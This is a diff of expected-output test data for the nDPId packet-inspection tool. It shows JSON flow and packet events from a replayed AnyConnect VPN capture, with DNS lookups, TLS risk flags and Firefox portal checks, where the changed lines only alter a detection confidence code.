00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1569687261486,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1569687261486,"pkt":"LH6BsEqhNDY7z3UoCABFAABPXz4AAP8RuuYKAADjS0tLS965ADUAO3SWXq8BAAABAAAAAAAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAHAAB"} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261486,"flow_last_seen":1569687261486,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261486,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261486,"flow_last_seen":1569687261486,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261486,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1569687261501,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1569687261501,"pkt":"NDY7z3UoLH6BsEqhCABFAACDAABAADoRnvFLS0tLCgAA4wA151YAb4gYIuOBgwABAAAAAQAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAAQABwBoABgABAAAcIAAoBmRuczEwMcAiCGRuc2FkbWluwCIBawJtAAAcIAAADhAACTqAAAAcIA=="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261501,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261501,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1569687261506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1569687261506,"pkt":"NDY7z3UoLH6BsEqhCABFAACDAABAADoRnvFLS0tLCgAA4wA13rkAbznpXq+BgwABAAAAAQAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAHAABwBoABgABAAAcIAAoBmRuczEwMcAiCGRuc2FkbWluwCIBawJtAAAcIAAADhAACTqAAAAcIA=="} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261506,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261506,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687262866,"flow_last_seen":1569687262866,"flow_idle_time":7580000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1569687262866,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1569687262866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBvT9S8yS4AYEAD8CwAAAQEIChwNvkTkAuRNDi2ISqeLxJuBXTMcrWivnw=="} 00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1569687262866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAAEWAABAAEAGYIgKAADjot4rmd4xAbu3QBvj9S8yS4AYEACf4gAAAQEIChwNvkTkAuRNC2FzYPnyOhEIxzv9HgAAAQAAAAAABf0HAAAAAAAAAFYAAAAAABO4pgAAAfJ1AAAAGzdZOcQAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAAEjynVwAAAAAACz6PAAAAAABmQ+JAyo3EgU6LQwAAAAAAAAAAAAAACK7duMsBAQAAAAELYXNg+fI6EQjHO\/0eAAABAAAAAAAF\/QcAAAAAAAAAVgAAAAAAE7imAAAB8nUAAAAbN1k5xAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAASPKdXAAAAAAALPo8AAAAAAAAAAQ=="} @@ -178,9 +178,9 @@ 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1569687267035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687267035,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95hAbsGNnxMAAAAALAC\/\/9wfAAAAgQFtAEDAwUBAQgKHA3OcQAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1569687267077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687267077,"pkt":"NDY7z3UoLH6BsEqhCABFAAA47VEAAPcGXQsIJWZbCgAA4wG73mHOEwD1BjZ8TZASgABbLAAAAgQFtAEBCAo\/+a5OHA3OcQ=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1569687267077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267077,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95hAbsGNnxNzhMA9oAQ\/\/\/yvgAAAQEIChwNzpw\/+a5O"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01587{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01587{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3eiXsRe4AREAA75QAAAQEIChwN0AsAIb2q"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -189,19 +189,19 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1569687267455,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267455,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3fiXsRfIAQEAAaFwAAAQEIChwN0A0AId91"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1569687267477,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1569687267477,"pkt":"LH6BsEqhNDY7z3UoCABFAAA5Pw0AAP8R2y0KAADjS0tLS9+lADUAJfklv50BAAABAAAAAAAAB21vemlsbGEDb3JnAAABAAE="} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1569687267481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1569687267481,"pkt":"LH6BsEqhNDY7z3UoCABFAABG89oAAP8RJlMKAADjS0tLS\/PbADUAMlit7RYBAAABAAAAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"thread_ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} -00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} 